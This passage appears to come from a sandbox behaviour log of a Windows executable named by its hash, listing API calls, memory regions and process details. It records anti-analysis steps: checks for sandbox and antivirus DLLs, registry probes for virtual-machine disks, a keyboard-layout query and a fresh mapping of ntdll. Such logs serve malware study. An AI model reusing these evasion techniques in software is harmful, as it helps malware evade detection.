[10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.564] ResumeThread (hThread=0x114) returned 0x1 [0115.613] CloseHandle (hObject=0x114) returned 1 [0115.613] CloseHandle (hObject=0x118) returned 1 [0115.614] ExitProcess (uExitCode=0x0) [0115.614] HeapFree (in: hHeap=0x4af0000, dwFlags=0x0, lpMem=0x4af05a8 | out: hHeap=0x4af0000) returned 1 Thread: id = 2 os_tid = 0xc28 Process: id = "2" image_name = "d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" page_root = "0x6f6d5000" os_pid = "0x5d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xd3c" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 320 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 321 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 322 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 323 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 324 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 325 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 326 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 327 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 328 start_va = 0x400000 end_va = 0x2ef3fff monitored = 1 entry_point = 0x402738 region_type = mapped_file name = "d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe") Region: id = 329 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 330 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 331 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 332 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 333 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 334 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 336 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 337 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 338 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 339 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 340 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 341 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 342 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 343 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 344 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 345 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 346 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 347 start_va = 0x410000 end_va = 0x4cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 348 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 349 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 350 start_va = 0x4e0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 351 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 352 start_va = 0x1c0000 end_va = 0x1e9fff monitored = 0 entry_point = 0x1c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 353 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 354 start_va = 0x620000 end_va = 0x7a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 355 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 356 start_va = 0x7b0000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 357 start_va = 0x940000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 358 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 359 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 360 start_va = 0x1c0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 361 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 362 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 363 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 364 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 365 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 366 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 367 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 368 start_va = 0x1d40000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 369 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 370 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 371 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 372 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 373 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 374 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 375 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 376 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 377 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 378 start_va = 0x1da0000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 379 start_va = 0x1ea0000 end_va = 0x201afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 380 start_va = 0x2020000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 381 start_va = 0x1d0000 end_va = 0x1d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 382 start_va = 0x1e0000 end_va = 0x1e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 802 start_va = 0x1d40000 end_va = 0x1d55fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 803 start_va = 0x1d90000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Thread: id = 3 os_tid = 0xd10 [0115.653] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0115.653] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74650000) returned 0x0 [0115.653] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0115.653] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74790000) returned 0x0 [0115.705] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0115.705] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x77820000) returned 0x0 [0118.933] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0118.933] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76370000) returned 0x0 [0129.929] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0129.929] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x1f75b0 [0129.930] GetKeyboardLayoutList (in: nBuff=1, lpList=0x1f75b0 | out: lpList=0x1f75b0) returned 1 [0129.930] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0129.930] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0129.930] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0129.931] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0129.932] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0129.932] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1ea0000 [0129.934] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe")) returned 0x62 [0129.935] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe", _SubStr="7869.vmt") returned 0x0 [0129.935] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0129.935] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0129.935] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0129.935] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0129.935] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0129.935] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x1f8950 [0129.935] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0129.935] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0129.936] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0129.936] LocalFree (hMem=0x1f8950) returned 0x0 [0129.936] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x1f8950 [0129.936] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0129.936] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0129.936] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0129.936] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0129.936] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x1fa060 [0129.936] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x1fa060, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x1fa060, ResultLength=0x19ff48) returned 0x0 [0129.936] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0129.936] LocalAlloc (uFlags=0x40, 